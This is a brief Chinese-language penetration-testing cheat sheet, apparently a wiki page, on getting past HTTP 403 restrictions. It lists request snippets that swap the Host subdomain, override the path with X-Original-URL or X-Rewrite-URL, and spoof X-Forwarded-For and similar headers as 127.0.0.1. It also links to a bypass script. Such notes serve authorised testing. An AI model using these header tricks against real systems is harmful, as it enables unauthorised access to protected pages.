403By Pass

whatweb [http://10.0.0.13](http://10.0.0.13/)
403Bypass常见方法

1.替换主机头的子域名
GET /auth/login HTTP/1.1
Host: $xxx$.abc.com

2.URL覆盖
GET / HTTP/1.1
方法一:
X-Original-URL: /auth/login
方法二:
X-Rewrite-URL: /auth/login
方法三:
ReFerer: http://xxx/auth/login

3.反向代理
Host: 10.0.0.13
X-Originating-IP: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

403 bypass 脚本:https://www.freebuf.com/sectool/259663.html

可以使用Burp+jython效果更好

最后更新于

这有帮助吗?